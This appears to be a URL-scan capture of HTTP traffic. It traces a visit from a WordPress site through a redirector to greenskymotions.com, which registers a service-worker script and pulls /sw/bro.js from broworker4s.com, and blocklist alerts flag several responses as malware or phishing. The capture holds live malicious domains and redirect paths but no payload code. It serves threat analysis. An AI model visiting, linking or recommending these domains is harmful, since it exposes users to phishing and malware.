x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: clsAMGVboAMFfxg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc067-13472a097177d4751c8f7a8c;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:32:23 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 6UQ_BhPmpVpe9w6gsExB-EpNq_syeCCK6fr4Y1FFK1jDJh_n1Sd0Eg==
via: 1.1 e291f351a18746d40754b367095a2872.cloudfront.net (CloudFront), 1.1 556b99c6be8d7078b9f067347c62df6a.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 21:52:47 GMT
age: 57591
etag: "22a8c4bd58c729c1abcf794466e8f3231dfb034b"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8315
Md5:    db1701b7b9d161a0c935bb6e10b17893
Sha1:   22a8c4bd58c729c1abcf794466e8f3231dfb034b
Sha256: b495524a33e5b1d3ba34cfbe867ada0da956c061370b1fcde06b23a6194a9787
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6df54ea7-8915-4ac7-af2b-6a71ce14dbf4.webp HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5681
x-amzn-requestid: 8f0d66b8-d532-48d9-9a29-74540cd6ab3a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cltXnEotIAMFqkA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc296-27349a376ff819ab63b04a81;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:41:42 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: Uz-wJTZjej3sjP-O68BQ4hB_kkAecG0o7GkeZUan90ZgV87g0Cg_ZA==
via: 1.1 26ca01ec7377e425b59b6a08cb1ec342.cloudfront.net (CloudFront), 1.1 3cd7af07832481c336aa1c93c9b4a6fe.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 21:52:38 GMT
age: 57600
etag: "36f4682ca6a33ff80ee02129c77e6f27e996ede0"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5681
Md5:    43309032a892c486f9985ef520df696e
Sha1:   36f4682ca6a33ff80ee02129c77e6f27e996ede0
Sha256: 24225ff504f30405d9ec3feb2555c738fcca0d6b265f285aa9c73a64c78a496e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3af2e495-85ff-410f-8418-e683c7f84bcd.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7728
x-amzn-requestid: 9f37e7a6-1f00-4a81-9b14-962fd0b6cdf4
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: clsAMEJxoAMFchQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc067-4a4cce217327b44525ea1e98;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:32:23 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: ztC4S0WeA3ft_9JafrL6fInXo4jwkb0cTWUx4Z8L2uz3EWQS-d6F5A==
via: 1.1 112c6b3f9aea37a6cb00b7d933e5af6e.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 22:02:47 GMT
age: 56991
etag: "9f80bb7ca6f699d88eaec2248dec508c589fe994"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7728
Md5:    027480c06cd67621f373c6765dafee4d
Sha1:   9f80bb7ca6f699d88eaec2248dec508c589fe994
Sha256: f69a0d6bd6e79d8fa7f2f15df11237c0a8b04d45af3cd5870eeef86d18f553bf
                                        
                                            GET /go.php?id=9677-22-5680954-11 HTTP/1.1 
Host: away.cdnbestplatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         91.211.91.104
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:39 GMT
content-length: 410
vary: Accept-Encoding
content-encoding: gzip
strict-transport-security: max-age=15768000;
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with CRLF line terminators
Size:   410
Md5:    872cdcc5c755ea55143788a9c61cf136
Sha1:   492c2c91952914f0cedaa22d410981b8fb9b27f6
Sha256: 63af39d037d9663149d6e820ec45cede1f26406260b35a4ed8dfcce6a95ebf20

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "29BA772027D2ECA99C13463843102C1EC88F5A724DA8129084819F0D36974B29"
Last-Modified: Sun, 04 Dec 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16494
Expires: Sun, 04 Dec 2022 18:27:33 GMT
Date: Sun, 04 Dec 2022 13:52:39 GMT
Connection: keep-alive

                                        
                                            GET /b91698fd2.js HTTP/1.1 
Host: greenskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Service-Worker: script
Connection: keep-alive
Cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656
Sec-Fetch-Dest: serviceworker
Sec-Fetch-Mode: same-origin
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

search
                                         185.177.94.152
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:39 GMT
content-length: 56
last-modified: Thu, 13 Oct 2022 01:01:02 GMT
etag: "6347634e-38"
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   56
Md5:    01fedb484c76c86eb5bafcc15b97bddc
Sha1:   aa3d7fba2de0e16f69798d6dc6e77d2765a90455
Sha256: 93f23f64c6e14a7778241254ad90d49a38dfe406afdd5e0e223064613572d40f

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: greenskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://greenskymotions.com/go/mu4genjugq5dcmjrhe3a?sub2=dfastspeed15
Cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         185.177.94.152
HTTP/2 204 No Content
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:39 GMT
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "6CB8FDB3F519B71EA5B3059FB001D9FD05C1D1E1F563262880E72EF7CF447602"
Last-Modified: Fri, 02 Dec 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5385
Expires: Sun, 04 Dec 2022 15:22:25 GMT
Date: Sun, 04 Dec 2022 13:52:40 GMT
Connection: keep-alive

                                        
                                            GET /b91698fd2.js HTTP/1.1 
Host: 0.greenskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Service-Worker: script
Connection: keep-alive
Cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656; uuid=7d6873aa-840c-4786-92e7-c992d53d5656
Sec-Fetch-Dest: serviceworker
Sec-Fetch-Mode: same-origin
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

search
                                         185.177.94.152
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:40 GMT
content-length: 56
last-modified: Thu, 13 Oct 2022 01:01:02 GMT
etag: "6347634e-38"
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   56
Md5:    01fedb484c76c86eb5bafcc15b97bddc
Sha1:   aa3d7fba2de0e16f69798d6dc6e77d2765a90455
Sha256: 93f23f64c6e14a7778241254ad90d49a38dfe406afdd5e0e223064613572d40f

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /index.php?p=mu4genjugq5dcmjrhe3a&sub2=dfastspeed15 HTTP/1.1 
Host: 0.greenskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://greenskymotions.com/
Cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
TE: trailers

search
                                         185.177.94.152
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:40 GMT
access-control-allow-origin: *
set-cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656; expires=Tue, 03-Jan-2023 13:52:40 GMT; Max-Age=2592000; path=/; domain=0.greenskymotions.com
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document, Unicode text, UTF-8 text, with very long lines (29334)
Size:   53131
Md5:    783554dd86dab3f3d3285d9476c0b2cb
Sha1:   9bb4b4baa7bd6607dc334509651182a877627688
Sha256: 966550e6a5f6664a616f54ccbc88d5806c03b133974acbacedad3b5507de5437
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "25253026EDA6A5F18BC94EB9B840F7231E0234578DE06651ADDB296C80B69E8E"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=8059
Expires: Sun, 04 Dec 2022 16:06:59 GMT
Date: Sun, 04 Dec 2022 13:52:40 GMT
Connection: keep-alive

                                        
                                            GET /go/mu4genjugq5dcmjrhe3a?sub2=dfastspeed15 HTTP/1.1 
Host: greenskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://away.cdnbestplatform.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         185.177.94.152
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:39 GMT
access-control-allow-origin: *
set-cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656; expires=Tue, 03-Jan-2023 13:52:39 GMT; Max-Age=2592000; path=/; domain=greenskymotions.com
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (7734)
Size:   18181
Md5:    e0a7c65966c02ff5464fe93e6ca3aab6
Sha1:   9bd4b706969fa8413f408704c5ad51318b58cd31
Sha256: 3147bdbd0a86eff046f06fd21ec65ae2a62fbe90e8f51eb9cf539c7002e87ac7

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /css?family=Ubuntu:400%2C500%7CPlay:700 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         142.250.74.74
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Sun, 04 Dec 2022 13:52:37 GMT
date: Sun, 04 Dec 2022 13:52:37 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.6.3.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Sat, 19 Nov 2022 18:21:34 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 39054
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /sw/bro.js HTTP/1.1 
Host: broworker4s.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://greenskymotions.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

search
                                         51.15.18.159
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:40 GMT
access-control-allow-origin: *
expires: Mon, 04 Dec 2023 13:52:40 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /sw/bro.js HTTP/1.1 
Host: broworker4s.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.greenskymotions.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

search
                                         51.15.18.159
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:40 GMT
access-control-allow-origin: *
expires: Mon, 04 Dec 2023 13:52:40 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:33 GMT
last-modified: Fri, 04 Nov 2022 18:25:28 GMT
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 37123
date: Sun, 04 Dec 2022 13:52:33 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /css?family=Ubuntu:400%7CPlay:700&display=swap&ver=1641848309 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         142.250.74.74
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Sun, 04 Dec 2022 13:52:37 GMT
date: Sun, 04 Dec 2022 13:52:37 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---